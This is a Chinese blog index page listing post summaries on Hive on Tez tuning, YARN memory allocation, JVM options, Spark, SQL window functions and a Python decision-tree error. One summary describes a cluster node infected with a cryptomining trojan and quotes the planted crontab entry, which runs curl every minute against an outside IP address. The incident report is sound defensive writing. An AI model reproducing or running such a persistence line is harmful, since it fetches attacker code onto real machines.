摘要: 本文转载自公众号 DBAplus社群 , 作者:谢麟炯 谢麟炯,唯品会大数据平台高级技术架构经理,主要负责大数据自助多维分析平台,离线数据开发平台及分析引擎团队的开发和管理工作,加入唯品会以来还曾负责流量基础数据的采集和数据仓库建设以及移动流量分析等数据产品的工作。 海量数据实时OLAP场景的困境 阅读全文
posted @ 2018-05-14 15:57 ¥王大胖¥ 阅读(336) 评论(0) 推荐(0) 编辑
摘要: 本人认为hive是很好的工具,目前支持mr,tez,spark执行引擎,有些大公司原来封装的sparksql,开发py脚本,但是目前hive支持spark引擎(不是很稳定,建议Tez先),所以离线还是用hive比较好。 先将工作中总结,以及学习其他人的hive优化总结如下: 一. 表连接优化 这是比 阅读全文
posted @ 2018-02-28 17:46 ¥王大胖¥ 阅读(700) 评论(0) 推荐(1) 编辑
摘要: 最近emr集群跑任务的时候总出现 task failed ,优化sql,调提交任务参数都没解决,最后再我排查时候,发现一个从节点的cpu使用800% 经过一些列排查,发现是被注入木马了, #被人种下的crontab#* * * * * curl -s http://158.69.133.17:822 阅读全文
posted @ 2018-02-08 15:54 ¥王大胖¥ 阅读(2055) 评论(0) 推荐(2) 编辑
摘要: 今天再hive on tez 跑任务的时候 OOM异常 然后找了些 JAVA OPTS设置: AVA_OPTS ,顾名思义,是用来设置JVM相关运行参数的变量。 JVM:JAVA_OPTS="-server -Xms2048m -Xmx2048m -Xss512k" -server:一定要作为第一个 阅读全文
posted @ 2018-02-07 17:13 ¥王大胖¥ 阅读(280) 评论(0) 推荐(1) 编辑
摘要: 上一篇hive on tez 任务报错中提到了containter内存不足,现对yarn 内存分配管理进行介绍 一、相关配置情况 关于Yarn内存分配与管理,主要涉及到了ResourceManage、ApplicationMatser、NodeManager这几个概念,相关的优化也要紧紧围绕着这几方 阅读全文
posted @ 2018-02-05 11:08 ¥王大胖¥ 阅读(1099) 评论(0) 推荐(1) 编辑
摘要: 最近再hue 集群查询任务经常失败,经过几天的观察,终于找到原因,报错如下 Status: FailedVertex failed, vertexName=Map 1, vertexId=vertex_1514128895713_0770_1_00, diagnostics=[Task failed 阅读全文
posted @ 2018-02-05 10:15 ¥王大胖¥ 阅读(8573) 评论(1) 推荐(1) 编辑
摘要: 我们采用亚马逊emr构建的集群,用hive查询的时候报错,FAILED: Execution Error, return code 2 from org.apache.hadoop.hive.ql.exec.tez.TezTask,查看了下面的参数,挺有帮助的 我是设置了这个参数set hive.t 阅读全文
posted @ 2018-02-02 16:24 ¥王大胖¥ 阅读(4919) 评论(0) 推荐(1) 编辑
摘要: 语法:row_number() over (partition by 字段a order by 计算项b desc ) rank --这里rank是别名 partition by:类似hive的建表,分区的意思; order by :排序,默认是升序,加desc降序; 这里按字段a分区,对计算项b进 阅读全文
posted @ 2018-01-22 14:12 ¥王大胖¥ 阅读(9463) 评论(0) 推荐(1) 编辑
摘要: 好记性不如烂笔头,分享一下 Spark是一个计算框架,是对mapreduce计算框架的改进,mapreduce计算框架是基于键值对也就是map的形式,之所以使用键值对是人们发现世界上大部分计算都可以使用map这样的简单计算模型进行计算。但是Spark里的计算模型却是数组形式,RDD如何处理Map的数 阅读全文
posted @ 2018-01-11 15:04 ¥王大胖¥ 阅读(224) 评论(0) 推荐(1) 编辑
摘要: 决策树python建模中的坑 代码 错误如下: Traceback (most recent call last): File "D:/workspace/python/.idea/decision_tree.py", line 55, in <module> predictedY = clf.pr 阅读全文
posted @ 2018-01-08 18:01 ¥王大胖¥ 阅读(6029) 评论(0) 推荐(3) 编辑